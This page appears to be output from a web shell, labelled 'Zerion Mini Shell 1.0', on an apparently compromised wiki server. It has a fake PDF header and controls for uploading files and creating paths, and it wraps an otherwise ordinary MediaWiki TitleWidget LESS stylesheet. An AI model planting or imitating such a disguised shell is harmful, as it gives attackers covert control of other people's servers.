%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/wiki.varak.net/resources/src/mediawiki.widgets/
Upload File :
Create Path :
Current File : /www/varak.net/wiki.varak.net/resources/src/mediawiki.widgets/mw.widgets.TitleWidget.less

/*!
 * MediaWiki Widgets - TitleWidget styles.
 *
 * @copyright 2011-2015 MediaWiki Widgets Team and others; see AUTHORS.txt
 * @license The MIT License (MIT); see LICENSE.txt
 */
@import 'mediawiki.mixins';

.mw-widget-titleWidget-menu {
	.mw-widget-titleOptionWidget {
		line-height: normal;

		&-description {
			color: #72777d;
		}
	}

	&-withImages {
		.mw-widget-titleOptionWidget {
			.box-sizing( border-box );
			min-height: 3.75em;
			padding-left: 4.75em;
			padding-top: 0.5em;
			padding-bottom: 0.5em;

			&:not( :last-child ) {
				margin-bottom: 2px;
			}

			> .oo-ui-labelElement-label {
				line-height: 2.8em;
			}

			&.oo-ui-iconElement {
				> .oo-ui-iconElement-icon {
					display: block;
					width: 3.75em;
					height: 3.75em;
					left: 0;
					&:not( .mw-widget-titleOptionWidget-hasImage ) {
						background-color: #c8ccd1;
						opacity: 0.4;
					}
					&.mw-widget-titleOptionWidget-hasImage {
						border: 0;
						background-size: cover;
						opacity: 0.7;
					}
				}
			}

			&.oo-ui-optionWidget-highlighted,
			&.oo-ui-optionWidget-selected {
				&.oo-ui-iconElement > .mw-widget-titleOptionWidget-hasImage {
					opacity: 1;
				}
			}
		}
	}

	&-withDescriptions {
		.mw-widget-titleOptionWidget {
			> .oo-ui-labelElement-label {
				line-height: 1.5em;
			}

			&-description {
				display: block;
				white-space: nowrap;
				text-overflow: ellipsis;
				overflow: hidden;
			}
		}
	}

	/* TODO: Should be able to use :not( &-withDescriptions ) but LESS version is buggy (T204816) */
	&:not( .mw-widget-titleWidget-menu-withDescriptions ) {
		.mw-widget-titleOptionWidget-description {
			display: none;
		}
	}
}

/* Icons */

.oo-ui-icon-page-disambiguation {
	/* @embed */
	background-image: url( images/page-disambiguation-ltr.svg );
}

.oo-ui-icon-page-existing {
	/* @embed */
	background-image: url( images/page-existing-ltr.svg );
}

.oo-ui-icon-page-not-found {
	/* @embed */
	background-image: url( images/page-not-found-ltr.svg );
}

.oo-ui-icon-page-not-found:lang( he ) {
	/* @embed */
	background-image: url( images/page-not-found-he-yi.svg );
}

.oo-ui-icon-page-redirect {
	/* @embed */
	background-image: url( images/page-redirect-ltr.svg );
}

Zerion Mini Shell 1.0